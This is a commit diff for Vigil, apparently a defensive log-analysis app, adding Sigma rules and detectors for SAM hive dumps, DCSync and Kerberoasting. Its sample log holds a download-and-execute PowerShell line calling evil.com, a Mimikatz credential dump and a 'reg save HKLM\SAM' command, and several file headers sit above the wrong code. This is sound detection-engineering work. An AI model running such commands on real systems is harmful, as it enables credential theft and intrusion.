Add live baseline diffing and credential access detection (SAM, DCSync, Kerberoasting)

- baselineEngine: parse CSV/JSON baselines, compute diff, export baseline
- EventContext: baseline state, ingestBaseline/clearBaseline, auto-recompute on ingest
- BaselineDiff: wired to live uploads and diff results; dynamic tab count in Shell
- Sigma SIGMA-029–031: SAM dump, DCSync (4662), Kerberos RC4 (4769)
- sigmaMatcher: raw Details/EventData fallback for domain-specific fields
- kerberoasting engine: RC4 burst detection; Dashboard banner; sample + README updates

Made-with: Cursor

Author: fevra-dev

README.md

@@ -38,3 +38,6 @@
 {"Timestamp":"2025-02-24T02:32:00.000Z","RuleTitle":"PowerShell ScriptBlock Logging","Level":"info","Computer":"WORKSTATION-07","Channel":"Microsoft-Windows-PowerShell/Operational","EventID":4104,"Details":{"ScriptBlockText":"$wc = New-Object System.Net.WebClient; $url = 'http://evil.com/payload';","ScriptBlockId":"d4e5f6a7-1111-2222-3333-abcdef123456","MessageNumber":"1","MessageTotal":"3","Path":"C:\\Temp\\update.ps1","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"","User":"CORP\\jsmith","ProcessGuid":"{abc-040}","ParentProcessGuid":"{abc-000}"},"MitreTags":["attack.t1059.001"],"MitreTactics":["Execution"]}
 {"Timestamp":"2025-02-24T02:32:01.000Z","RuleTitle":"PowerShell ScriptBlock Logging","Level":"info","Computer":"WORKSTATION-07","Channel":"Microsoft-Windows-PowerShell/Operational","EventID":4104,"Details":{"ScriptBlockText":"$data = $wc.DownloadString($url); IEX $data;","ScriptBlockId":"d4e5f6a7-1111-2222-3333-abcdef123456","MessageNumber":"2","MessageTotal":"3","Path":"C:\\Temp\\update.ps1","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"","User":"CORP\\jsmith","ProcessGuid":"{abc-041}","ParentProcessGuid":"{abc-000}"},"MitreTags":["attack.t1059.001"],"MitreTactics":["Execution"]}
 {"Timestamp":"2025-02-24T02:32:02.000Z","RuleTitle":"PowerShell ScriptBlock Logging","Level":"info","Computer":"WORKSTATION-07","Channel":"Microsoft-Windows-PowerShell/Operational","EventID":4104,"Details":{"ScriptBlockText":"Invoke-Mimikatz -DumpCreds | Out-File C:\\Temp\\creds.txt","ScriptBlockId":"d4e5f6a7-1111-2222-3333-abcdef123456","MessageNumber":"3","MessageTotal":"3","Path":"C:\\Temp\\update.ps1","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"","User":"CORP\\jsmith","ProcessGuid":"{abc-042}","ParentProcessGuid":"{abc-000}"},"MitreTags":["attack.t1059.001"],"MitreTactics":["Execution"]}
+{"Timestamp":"2025-02-24T02:33:00.000Z","RuleTitle":"SAM Registry Hive Dump","Level":"crit","Computer":"WORKSTATION-07","Channel":"Microsoft-Windows-Sysmon/Operational","EventID":1,"Details":{"CommandLine":"reg.exe save HKLM\\SAM C:\\Users\\jsmith\\AppData\\Local\\Temp\\sam.hiv","Image":"C:\\Windows\\System32\\reg.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","User":"CORP\\jsmith","ProcessGuid":"{abc-050}","ParentProcessGuid":"{abc-000}"},"MitreTags":["attack.t1003.002"],"MitreTactics":["Credential Access"]}
+{"Timestamp":"2025-02-24T02:34:00.000Z","RuleTitle":"DCSync Directory Replication","Level":"crit","Computer":"DC-01","Channel":"Security","EventID":4662,"Details":{"SubjectUserName":"jsmith","SubjectDomainName":"CORP","ObjectType":"%{19195a5b-6da0-11d0-afd3-00c04fd930c9}","ObjectName":"DC=corp,DC=local","Properties":"%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}","AccessMask":"0x100","CommandLine":"","Image":"","ProcessGuid":"{dc-050}","ParentProcessGuid":""},"MitreTags":["attack.t1003.006"],"MitreTactics":["Credential Access"]}
+{"Timestamp":"2025-02-24T02:35:00.000Z","RuleTitle":"Kerberos Service Ticket Request — RC4","Level":"high","Computer":"DC-01","Channel":"Security","EventID":4769,"Details":{"TargetUserName":"jsmith","ServiceName":"MSSQLSvc/sql01.corp.local:1433","TicketEncryptionType":"0x17","IpAddress":"10.10.5.22","CommandLine":"","Image":"","ProcessGuid":"{dc-060}","ParentProcessGuid":""},"MitreTags":["attack.t1558.003"],"MitreTactics":["Credential Access"]}

vigil-run/public/sample/hayabusa-demo.jsonl

@@ -8,7 +8,7 @@ import { EIDStats } from './EIDStats';
  * Dashboard — top-level incident overview with stats, threat actor
  * attribution, and a condensed kill-chain timeline.
  */
-export function Dashboard({ events, correlations, ransomwareChain, lateralMovement }) {
+export function Dashboard({ events, correlations, ransomwareChain, lateralMovement, kerberoasting }) {
   const critCount = events.filter(e => e.severity === "critical").length;
   const highCount = events.filter(e => e.severity === "high").length;
   const hosts = [...new Set(events.map(e => e.host))];
@@ -103,6 +103,37 @@ export function Dashboard({ events, correlations, ransomwareChain, lateralMoveme
         </div>
       )}
 
+      {/* Kerberoasting banner — credential access alert */}
+      {kerberoasting?.detected && (
+        <div style={{
+          background: T.high + "0a", border: `1px solid ${T.high}30`,
+          padding: "14px 20px", display: "flex", alignItems: "center", gap: 16,
+          borderLeft: `3px solid ${T.high}`,
+        }}>
+          <div style={{
+            width: 32, height: 32, borderRadius: "50%",
+            display: "flex", alignItems: "center", justifyContent: "center",
+            background: T.high + "20", flexShrink: 0,
+          }}>
+            <span style={{ fontSize: 14, color: T.high, fontWeight: 700 }}>K</span>
+          </div>
+          <div style={{ flex: 1 }}>
+            <div style={{
+              fontSize: 11, fontWeight: 700, color: T.high,
+              letterSpacing: "0.08em", marginBottom: 4,
+            }}>
+              KERBEROASTING DETECTED
+            </div>
+            <div style={{ fontSize: 11, color: T.text2, lineHeight: 1.6 }}>
+              {kerberoasting.bursts.length} service ticket burst{kerberoasting.bursts.length !== 1 ? "s" : ""} from{" "}
+              {new Set(kerberoasting.bursts.map(b => b.account)).size} account{new Set(kerberoasting.bursts.map(b => b.account)).size !== 1 ? "s" : ""}.{" "}
+              {kerberoasting.bursts.map(b => `${b.account} requested ${b.serviceCount} RC4 tickets`).join("; ")}.
+              Review EID 4769 events with RC4 encryption in Log analyser.
+            </div>
+          </div>
+        </div>
+      )}
+
       {/* Active incident notice */}
       <div style={{ borderLeft: `2px solid ${T.critical}`, paddingLeft: 16, paddingTop: 8, paddingBottom: 8, background: "#140808" }}>
         <div style={{ fontSize: 11, fontWeight: 600, color: T.critical, letterSpacing: "0.06em", marginBottom: 4 }}>ACTIVE INCIDENT — LotL Multi-Stage Intrusion</div>

vigil-run/src/components/BaselineDiff.jsx

@@ -9,7 +9,6 @@ import { T } from "./tokens";
 import { Mono } from "./atoms";
 import { useEvents } from "../store/EventContext";
 import { SIGMA_RULES } from "../data/sigmaRules";
-import { NEW_FINDINGS } from "../data/baselineData";
 import { exportJSON, exportCSV } from "../engine/exporter";
 import { Dashboard } from "./Dashboard";
 import { LogAnalyzer } from "./LogAnalyzer";
@@ -28,7 +27,7 @@ import { FileDropZone, ImportButton } from "./FileInput";
 export default function Shell() {
   const [tab, setTab] = useState("dashboard");
   const [showExport, setShowExport] = useState(false);
-  const { events, correlations, ransomwareChain, lateralMovement, source, fileName, isProcessing, stats, ingestFile, loadSample } = useEvents();
+  const { events, correlations, ransomwareChain, lateralMovement, kerberoasting, baseline, baselineDiff, source, fileName, isProcessing, stats, ingestFile, ingestBaseline, clearBaseline, loadSample } = useEvents();
 
   const tabs = [
     { id: "dashboard",    label: "Dashboard" },
@@ -39,7 +38,7 @@ export default function Shell() {
     { id: "logons",       label: "Logon summary" },
     { id: "ransomware",   label: "Ransomware chain" },
     { id: "lateral",      label: "Lateral movement" },
-    { id: "baseline",     label: "Baseline diff" },
+    { id: "baseline",     label: baseline?.entries?.length > 0 && baselineDiff?.stats?.new > 0 ? `Baseline diff (${baselineDiff.stats.new})` : "Baseline diff" },
     { id: "sigma",        label: "Sigma workshop" },
     { id: "mitre",        label: "ATT&CK map" },
     { id: "lolbins",      label: "LOLBin radar" },
@@ -182,7 +181,7 @@ export default function Shell() {
                 <FileDropZone onIngest={ingestFile} />
               </div>
             )}
-            <Dashboard events={events} correlations={correlations} ransomwareChain={ransomwareChain} lateralMovement={lateralMovement} />
+            <Dashboard events={events} correlations={correlations} ransomwareChain={ransomwareChain} lateralMovement={lateralMovement} kerberoasting={kerberoasting} />
           </div>
         )}
         {tab === "logs"         && <LogAnalyzer events={events} />}
@@ -192,7 +191,7 @@ export default function Shell() {
         {tab === "logons"       && <LogonSummary events={events} />}
         {tab === "ransomware"   && <RansomwareChain events={events} ransomwareChain={ransomwareChain} />}
         {tab === "lateral"      && <LateralMovement lateralMovement={lateralMovement} />}
-        {tab === "baseline"     && <BaselineDiff />}
+        {tab === "baseline"     && <BaselineDiff events={events} baseline={baseline} baselineDiff={baselineDiff} ingestBaseline={ingestBaseline} clearBaseline={clearBaseline} />}
         {tab === "sigma"        && <SigmaWorkshop />}
         {tab === "mitre"        && <MitreMap />}
         {tab === "lolbins"      && <LolbinRadar />}
@@ -201,7 +200,7 @@ export default function Shell() {
       {/* Footer */}
       <div style={{ borderTop: `1px solid ${T.border}`, padding: "12px 32px", display: "flex", justifyContent: "space-between", maxWidth: 1360, margin: "0 auto" }}>
         <span style={{ fontSize: 10, color: T.text3, letterSpacing: "0.06em" }}>
-          Vigil 4.0  ·  {SIGMA_RULES.length} Sigma rules  ·  MITRE ATT&CK v15  ·  Ransomware chain  ·  Lateral movement  ·  PS decoder  ·  Hayabusa/Chainsaw ingestion
+          Vigil 6.0  ·  {SIGMA_RULES.length} Sigma rules  ·  MITRE ATT&CK v15  ·  Ransomware chain  ·  Lateral movement  ·  Credential access  ·  PS decoder  ·  ScriptBlock reassembly  ·  Baseline diffing
         </span>
         <span style={{ fontSize: 10, color: T.text3, letterSpacing: "0.06em" }}>Detection Engineering  ·  DFIR  ·  Blue Team Portfolio</span>
       </div>

vigil-run/src/components/Dashboard.jsx

@@ -45,6 +45,11 @@ export const MITRE_TECHNIQUES = [
   { id: "T1087.002", name: "Account Discovery: Domain Account", tactic: "Credential Access", severity: "high" },
   { id: "T1027.010", name: "Command Obfuscation", tactic: "Defense Evasion", severity: "high" },
   { id: "T1218", name: "System Binary Proxy Execution", tactic: "Defense Evasion", severity: "high" },
+
+  // Sprint 6 additions — Credential Access beyond LSASS
+  { id: "T1003.002", name: "SAM Registry Dump", tactic: "Credential Access", severity: "critical" },
+  { id: "T1003.006", name: "DCSync", tactic: "Credential Access", severity: "critical" },
+  { id: "T1558.003", name: "Kerberoasting", tactic: "Credential Access", severity: "critical" },
 ];
 
 export const TACTIC_ORDER = ["Execution", "Persistence", "Privilege Escalation", "Defense Evasion", "Credential Access", "Lateral Movement", "Command & Control", "Impact"];

vigil-run/src/components/Shell.jsx

@@ -1205,5 +1205,138 @@ level: critical
 tags:
   - attack.defense_evasion
   - attack.t1218`
+  },
+
+  // ── Sprint 6: Credential Access Detection (SIGMA-029 to SIGMA-031) ────
+
+  {
+    id: "SIGMA-029",
+    title: "SAM Registry Hive Dump via reg.exe",
+    corrId: null,
+    status: "stable",
+    level: "critical",
+    tags: ["attack.credential_access", "attack.t1003.002"],
+    references: ["https://attack.mitre.org/techniques/T1003/002/"],
+    yaml: `title: SAM Registry Hive Dump via reg.exe
+id: c1d2e3f4-aaaa-4ccc-daaa-aaaaaaaaa001
+status: stable
+description: |
+  Detects reg.exe saving SAM, SYSTEM, or SECURITY registry hives to
+  disk. These three hives together enable offline credential extraction
+  using tools like secretsdump.py or mimikatz. Any 'reg save' targeting
+  HKLM\\SAM, HKLM\\SYSTEM, or HKLM\\SECURITY is a strong indicator of
+  credential harvesting and should trigger immediate investigation.
+author: VIGIL Detection Engineering
+date: 2025-03-15
+mitre_attack:
+  - T1003.002  # OS Credential Dumping: Security Account Manager
+logsource:
+  category: process_creation
+  product: windows
+detection:
+  selection_cmd:
+    CommandLine|contains|all:
+      - 'reg'
+      - 'save'
+  selection_hive:
+    CommandLine|contains:
+      - 'HKLM\\SAM'
+      - 'HKLM\\SYSTEM'
+      - 'HKLM\\SECURITY'
+      - 'hklm\\sam'
+      - 'hklm\\system'
+      - 'hklm\\security'
+  condition: selection_cmd and selection_hive
+falsepositives:
+  - Legitimate backup scripts exporting registry hives (rare, validate context)
+level: critical
+tags:
+  - attack.credential_access
+  - attack.t1003.002`
+  },
+
+  {
+    id: "SIGMA-030",
+    title: "DCSync — Directory Replication via EID 4662",
+    corrId: null,
+    status: "stable",
+    level: "critical",
+    tags: ["attack.credential_access", "attack.t1003.006"],
+    references: ["https://attack.mitre.org/techniques/T1003/006/", "https://adsecurity.org/?p=1729"],
+    yaml: `title: DCSync Attack — Directory Replication Access Rights Requested
+id: c1d2e3f4-aaaa-4ccc-daaa-aaaaaaaaa002
+status: stable
+description: |
+  Detects EID 4662 (Directory Service Access) where the Properties
+  field contains Active Directory replication GUIDs. When a non-DC
+  account requests DS-Replication-Get-Changes-All or Get-Changes,
+  it indicates a DCSync attack — typically via Mimikatz's
+  lsadump::dcsync. This allows an attacker to replicate any domain
+  account's password hash remotely without touching LSASS.
+author: VIGIL Detection Engineering
+date: 2025-03-15
+mitre_attack:
+  - T1003.006  # OS Credential Dumping: DCSync
+logsource:
+  product: windows
+  service: security
+detection:
+  selection:
+    EventID: 4662
+    Properties|contains:
+      - '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'
+      - '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'
+      - '89e95b76-444d-4c62-991a-0facbeda640c'
+  filter_dc:
+    SubjectUserName|endswith: '$'
+  condition: selection and not filter_dc
+falsepositives:
+  - Domain Controller machine accounts performing legitimate replication
+  - Azure AD Connect service accounts (validate naming convention)
+level: critical
+tags:
+  - attack.credential_access
+  - attack.t1003.006`
+  },
+
+  {
+    id: "SIGMA-031",
+    title: "Kerberos RC4 Service Ticket Request — Kerberoasting Indicator",
+    corrId: null,
+    status: "stable",
+    level: "high",
+    tags: ["attack.credential_access", "attack.t1558.003"],
+    references: ["https://attack.mitre.org/techniques/T1558/003/"],
+    yaml: `title: Kerberos Service Ticket Requested with RC4 Encryption
+id: c1d2e3f4-aaaa-4ccc-daaa-aaaaaaaaa003
+status: stable
+description: |
+  Detects EID 4769 (Kerberos Service Ticket Operation) where the
+  TicketEncryptionType is 0x17 (RC4-HMAC). Modern environments use
+  AES (0x11/0x12); RC4 requests are a strong indicator of
+  Kerberoasting — requesting service tickets with weak encryption
+  for offline password cracking. Individual hits are suspicious;
+  the Kerberoasting burst detector escalates 5+ hits to critical.
+author: VIGIL Detection Engineering
+date: 2025-03-15
+mitre_attack:
+  - T1558.003  # Steal or Forge Kerberos Tickets: Kerberoasting
+logsource:
+  product: windows
+  service: security
+detection:
+  selection:
+    EventID: 4769
+    TicketEncryptionType|contains: '0x17'
+  filter_machine:
+    SubjectUserName|endswith: '$'
+  condition: selection and not filter_machine
+falsepositives:
+  - Legacy applications requiring RC4 for backward compatibility
+  - Service accounts with forced RC4 encryption (validate with AD team)
+level: high
+tags:
+  - attack.credential_access
+  - attack.t1558.003`
   }
 ];